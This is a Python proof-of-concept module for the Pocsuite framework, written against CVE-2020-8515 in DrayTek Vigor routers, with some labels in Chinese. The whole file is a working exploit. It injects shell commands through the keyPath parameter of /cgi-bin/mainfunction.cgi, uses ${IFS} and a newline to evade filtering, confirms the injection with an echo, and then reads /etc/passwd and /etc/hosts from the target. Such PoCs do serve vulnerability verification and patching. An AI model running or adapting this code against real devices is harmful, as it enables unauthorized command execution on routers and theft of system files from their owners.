import urlparse from pocsuite.api.poc import POCBase from pocsuite.api.poc import register from pocsuite.api.poc import Output from pocsuite.api.request import req from pocsuite.api.utils import randomStr class TestPOC(POCBase): vulID = 'CVE-2020-8515' version = '' author = 'elloit' vulDate = '2020-03-30' createDate = '2020-03-30' updateDate = '2020-03-30' references = [ "https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/", "https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices/" ] name = 'CVE-2020-8515 draytek 企业级路由器命令执行漏洞' appPowerLink = '"https://www.draytek.com/' appName = 'DrayTek Vigor' appVersion = ''' ''' vulType = '命令执行' desc = ''' ''' samples = [ ] install_requires = "" def _attack(self): return self._verify() def _verify(self): result = {} self.raw_url = self.url host = urlparse.urlparse(self.url).hostname port = urlparse.urlparse(self.url).port scheme = urlparse.urlparse(self.url).scheme if port is None: port = "80" else: port = str(port) if "https" == scheme: self.url = "%s://%s" % (scheme, host) else: self.url = "%s://%s:%s" % (scheme, host, port) try: flag = randomStr(10) check = self.run_cmd("echo${IFS}" + flag).split("\n")[0] if flag == check: result["VerifyInfo"] = {} result["VerifyInfo"]["url"] = self.url result["VerifyInfo"]["passwd"] = self.run_cmd("cat${IFS}%2fetc%2fpasswd") result["VerifyInfo"]["hosts"] = self.run_cmd("cat${IFS}%2fetc%2fhosts") except Exception as e: pass return self.parse_output(result) def run_cmd(self, cmd): try: headers = { "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" } url = self.url + "/cgi-bin/mainfunction.cgi" data = "action=login&keyPath=%27%0A%2fbin%2f" + cmd + "%0A%27&loginUser=a&loginPwd=a" res = req.post(url=url, data=data, timeout=(10, 15), headers=headers) if res.status_code == 200: return res.text else: return "" except Exception as e: return "" def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(TestPOC)